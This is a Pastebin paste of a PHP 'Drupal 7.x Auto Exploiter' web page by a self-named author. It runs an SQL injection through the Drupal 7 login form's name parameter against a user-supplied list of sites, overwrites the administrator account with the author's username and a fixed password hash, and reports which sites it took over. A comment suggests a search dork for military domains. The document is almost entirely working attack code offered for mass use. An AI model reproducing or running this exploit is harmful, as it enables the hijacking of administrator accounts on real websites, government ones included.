API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 3rd, 2016
167
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.74 KB | None | 0 0
raw download clone embed print report
  1. <html><title>Drupal 7.x Auto Exploiter</title>
  2. <body bgcolor="#000000">
  3. <font color='red'><pre><p><center>
  4. _____ _ _ _ _ __
  5. | ___|_ _| | | | ___ | | __ _| |/ /___
  6. | |_ / _` | |_| |/ _ \| |/ _` | ' // _ \
  7. | _| (_| | _ | (_) | | (_| | . \ (_) |
  8. |_| \__,_|_| |_|\___/|_|\__,_|_|\_\___/
  9.  
  10. #Drupal Auto Exploiter
  11. #Coded by sofyan
  12. #Contact:v0v@outlook.com
  13. ______________________________________________________________
  14.  
  15. <pre>List Sites :</font><hre>
  16. <form method='POST'>
  17. <textarea name='sites' cols='45' rows='15'></textarea>
  18. <input type='submit' value='Exploit' /><br>
  19. </form>
  20. <?php
  21. /*
  22. Coded by sofyan
  23. inurl:sites/default/files/ site:mil.**
  24. */
  25. error_reporting(0);
  26. $log = "/user/login";
  27. $url=explode("\r\n", $_POST['sites']);
  28. foreach ($url as $site) {
  29. $sofyan = "/?q=user";
  30. $post_data = "name[0;update users set name %3D 'sofyan' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  31. $params = array(
  32. 'http' => array(
  33. 'method' => 'POST',
  34. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  35. 'content' => $post_data
  36. )
  37. );
  38. $ctx = stream_context_create($params);
  39. $data = file_get_contents($site . '/user/login/', null, $ctx);
  40. echo "<font color=blue>Testing user/login $site/user/login <br>";
  41. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
  42. echo "<font color=green>User :sofyan <br>Password :admin<br>";
  43. } else {
  44. echo "<font color=red>Not Vulnerable. <br>";
  45. }
  46. }
  47. $url=explode("\r\n", $_POST['sites']);
  48. foreach ($url as $site) {
  49. $post_data = "name[0;update users set name %3D 'sofyan' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  50. $params = array(
  51. 'http' => array(
  52. 'method' => 'POST',
  53. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  54. 'content' => $post_data
  55. )
  56. );
  57. $ctx = stream_context_create($params);
  58. $data = file_get_contents($site . '?q=node&destination=node', null, $ctx);
  59. echo "<font color=blue>Testing at Index $site/user/login <br>";
  60. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  61. echo "<font color=green>User :sofyan <br> Password :admin <br>";
  62.  
  63. } else {
  64. echo "<font color=red>Not Vulnerable. \n ";
  65. }
  66. }
  67. ?>
  68. </pre></p></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!